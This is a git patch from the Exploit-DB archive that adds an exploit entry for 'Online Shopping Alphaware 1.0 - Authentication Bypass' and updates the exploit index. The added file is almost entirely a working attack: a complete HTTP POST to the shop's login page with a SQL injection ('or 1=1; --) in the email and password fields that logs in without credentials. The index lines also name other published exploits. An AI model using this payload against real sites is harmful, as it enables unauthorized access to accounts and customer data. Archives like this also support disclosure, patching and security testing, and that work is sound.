From 3e562993353b93f5490565ee60d04079bf4e8bed Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 31 Jul 2020 05:02:04 +0000
Subject: [PATCH] DB: 2020-07-31

1 changes to exploits/shellcodes

Online Shopping Alphaware 1.0 - Authentication Bypass
---
 exploits/php/webapps/48725.txt | 24 ++++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 25 insertions(+)
 create mode 100644 exploits/php/webapps/48725.txt

diff --git a/exploits/php/webapps/48725.txt b/exploits/php/webapps/48725.txt
new file mode 100644
index 000000000..04364363d
--- /dev/null
+++ b/exploits/php/webapps/48725.txt
@@ -0,0 +1,24 @@
+# Title: Online Shopping Alphaware 1.0 - Authentication Bypass
+# Exploit Author: Ahmed Abbas
+# Date: 2020-07-28
+# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+ 
+# Malicious POST Request to https://TARGET
+POST /alphaware/index.php HTTP/1.1
+Host: 172.16.65.130
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.65.130/alphaware/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 72
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=gqhv9sl4d1bdtr4pspm887ft2n
+Upgrade-Insecure-Requests: 1
+
+email='+or+1%3d1%3b+--+ahmed&password='+or+1%3d1%3b+--+ahmed&login=Login
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a8febbfec..95944de3b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42967,3 +42967,4 @@ id,file,description,date,author,type,platform,port
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
 48724,exploits/php/webapps/48724.txt,"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting",2020-07-29,"Jinson Varghese Behanan",webapps,php,
+48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,